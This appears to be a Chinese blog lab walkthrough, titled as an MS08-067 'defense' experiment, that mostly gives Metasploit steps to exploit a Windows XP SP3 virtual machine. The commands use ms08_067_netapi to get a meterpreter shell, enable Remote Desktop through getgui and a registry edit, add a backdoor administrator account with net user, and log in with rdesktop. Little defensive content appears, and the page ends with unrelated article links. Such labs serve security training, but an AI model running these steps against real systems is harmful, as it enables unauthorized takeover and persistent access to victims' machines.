Defense:MS08067漏洞攻防渗透实验
实验环境
Windows XP SP3
IP:172.16.211.129
百度网盘:https://pan.baidu.com/s/1dbBGdkM6aDzXcKajV47zBw 靶机环境
Kali Linux 2.0
IP:172.16.211.128
实验原理
漏洞名称:Windows Server服务RPC请求缓冲区溢出漏洞(MS08-067)此安全更新解决了服务器服务中一个秘密报告的漏洞。如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。
在 Microsoft Windows 2000、Windows XP 和 Windows Server 2003 系统上,攻击者可能未经身份验证即可利用此漏洞运行任意代码。 此漏洞可能用于进行蠕虫攻击。
防火墙最佳做法和标准的默认防火墙配置有助于保护网络资源免受从企业外部发起的攻击。
Kali 启动metasploit服务
kali linux 2.0 本身已内置metasploit,kali 2.0 已经没有metasploit 这个服务了,所以service metasploit start 的方式不起作用。
kali 2.0中启动带数据库支持的msf方式
#首先启动postgresql数据库
/etc/init.d/postgresql start;
或者
service postgresql start; #初始化MSF数据库(关键步骤!)
msfdb init; #运行msfconsole
msfconsole; #在msf中查看数据库连接状态
db_status #将postgresql数据库设置开机自启
update-rc.d postgresql enable
漏洞利用过程
在msfconsole使用 search 命令搜索MS08067漏洞攻击程序

从结果中得到 exploit/windows/smb/ms08_067_netapi
表示当前msf框架中包含MS08067漏洞的攻击插件。
使用use命令调用MS08067漏洞攻击程序
#进入msf的交互式命令窗口
use exploit/windows/smb/ms08_067_netapi
查看需要设置的选项
#查看设置选项
show options

从图中可以看到还需设置RHOST(目标地址)、Exploit target(攻击目标)
使用 set 命令设置 Module Options
#设置目标IP即
set rhost 172.16.211.129

使用show options 命令查看设置情况

从中可以看出目标IP已经设置好了,接着设置Exploit target,使用show targets 查看可选项可以看出以下版本的系统均存在此漏洞。
因为实例演示的XP系统为WinXP SP3 简体中文版对应的编号为34

使用set target 命令设置目标
#设置目标
set target 34

使用exploit 或者 run 命令进行攻击
#进行攻击
exploit
或者
run

执行命令后得到一个meterpreter命令行交互窗口
打开RDP(远程桌面)服务
#打开远程服务 端口3389(meterpreter命令行交互窗口执行命令)
run getgui -e
进入CMD窗口
#进入cmd窗口
shell

在cmd命令下也可以通过添加注册表项的方式开启对方远程桌面服务(如果上面已经开启了,这步可以省略)。
#开启远程服务
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server /v fDenyTSConnections" /t REG_DWORD /d 00000000 /f
查看端口是否开放
#查看端口状态
netstat -ano

查看XP系统中的用户
#查看系统中用户
net user

添加账户和管理员权限
#添加用户
格式一
net user user pass /add
例如:net user gao 123 /add 格式二
net localgroup administrators /add
例如:net localgroup administrators gao /add
用本机Ka li 远程访问目标主机(利用新建的用户)
rdesktop -a 32 -u gao -p 123 172.16.211.129:3389
完成Windows XP SP3系统侵入!!
Defense:MS08067漏洞攻防渗透实验的更多相关文章
- ms08-067漏洞--初识渗透测试--想必很多初学者都会遇到我文中提及的各种问题
最近读了一本书--<<渗透测试实践指南>>,测试了书中的一些例子后,开始拿ms08-067这个经典的严重漏洞练手,实践当中遇到诸多问题,好在一一解决了,获益匪浅. 在谷歌搜索的 ...
- ms08-067漏洞的复现
MS08-067漏洞重现 (1):MS08-067远程溢出漏洞描述 MS08-067漏洞的全称为“Windows Server服务RPC请求缓冲区溢出漏洞”,如果用户在受影响的系统上收到特制的 RPC ...
- 《Web安全攻防 渗透测试实战指南 》 学习笔记 (五)
Web安全攻防 渗透测试实战指南 学习笔记 (五) 第四章 Web安全原理解析 (一) (一)SQL注入的原理 1.web应用程序对用户输入数据的合法性没有判断. 2.参数用户可控:前端传给 ...
- 《Web安全攻防 渗透测试实战指南》 学习笔记 (二)
Web安全攻防 渗透测试实战指南 学习笔记 (二) 第二章 漏洞环境及实践
- 转载--无弹窗APT渗透实验
转载--无弹窗APT渗透实验 文章作者:亚信安全,转载自 FreeBuf.COM APT攻击方式花样繁多,我研究最近的流行的APT攻击方式,在本地搭建环境模拟一次简单的APT攻击,在模拟攻击过程中发现 ...
- 20155201 网络攻防技术 实验九 Web安全基础
20155201 网络攻防技术 实验九 Web安全基础 一.实践内容 本实践的目标理解常用网络攻击技术的基本原理.Webgoat实践下相关实验. 二.报告内容: 1. 基础问题回答 1)SQL注入攻击 ...
- 20155201 网络攻防技术 实验八 Web基础
20155201 网络攻防技术 实验八 Web基础 一.实践内容 Web前端HTML,能正常安装.启停Apache.理解HTML,理解表单,理解GET与POST方法,编写一个含有表单的HTML. We ...
- 20155201 网络攻防技术 实验五 MSF基础应用
20155201 网络攻防技术 实验五 MSF基础应用 一.实践内容 一个主动攻击实践,如ms08_067 一个针对浏览器的攻击,如ms11_050 一个针对客户端的攻击,如Adobe 成功应用任何一 ...
- 20155235 《网络攻防》 实验九 Web安全基础
20155235 <网络攻防> 实验九 Web安全基础 实验内容 SQL注入攻击 XSS攻击 CSRF攻击 WebGoat WebGoat是OWASP组织研制出的用于进行web漏洞实验的应 ...
随机推荐
- 1.5linux用户权限相关命令
用户权限相关命令 目标 用户 和 权限 的基本概念 用户管理 终端命令 组管理 终端命令 修改权限 终端命令 01. 用户 和 权限 的基本概念 1.1 基本概念 用户 是 Linux 系统工作中重要 ...
- FOC_矢量控制相关资料
http://www.eepw.com.cn/news/listbylabel/label/FOC/ FOC(field-oriented control)为磁场导向控制,又称为矢量控制(vector ...
- mysql数据库-备份与还原实操
目录 备份工具 1 基于 LVM 的快照备份(几乎热备) 2 数据库冷备份和还原 3 mysqldump备份工具 3.1 实战备份策略 3.1.1 全备份 3.1.2 分库分表备份 3.2 mysql ...
- unity editor模式下读取文件夹资源
string path = EditorUtility.OpenFolderPanel("Load png Textures", "", "" ...
- Objective Evaluation Index of image
图像质量客观评价指标 在做红外图像细节增强算法研究时,很重要一点就是要对经过算法处理的图像结果进行评价,分成两种评价方法.一种是视觉效果评价:主观的人眼观察,主要是通过观察者能否看到更多图像细节,给人 ...
- 鸿蒙 Android iOS 应用开发对比02
个人理解,不抬杠 转载请注明原著:博客园老钟 https://www.cnblogs.com/littlecarry/ IOS 把界面抽象成 "控制" Controller:And ...
- Python+Selenium学习笔记15 - 读取txt和csv文件
读取txt的内容并用百度查找搜索 1 # coding = utf-8 2 3 from selenium import webdriver 4 import time 5 6 # 打开浏览器 7 d ...
- nginx 重定向到系统维护页面
上周末兄弟项目准备扩展服务器以便提供更好的服务,兄弟项目有一些功能是实时提供到我这边的,需要我这边暂时把对应系统功能屏蔽,因为使用nginx,所以可以直接配置nginx重定向到固定系统维护页面. ng ...
- MCU,硅片,BOM
MCU,硅片,BOM BOM(Bill of Material,物料清单),就是指一个东西的各个材料的的成本价格 BOM成本要控制,有三点要注意的. 一,是否有芯片替代料,在性能不降低的情况下,替代料 ...
- ALD对照CVD淀积技术的优势
ALD对照CVD淀积技术的优势 ALD 适合制备很薄的高K金属氧化物层,对腔室的真空度要求比较高,对反应气体源及比例的要求也较高. 目前沉积速率还是比较慢,大大限制了其在工业上的推广应用,不过随着设备 ...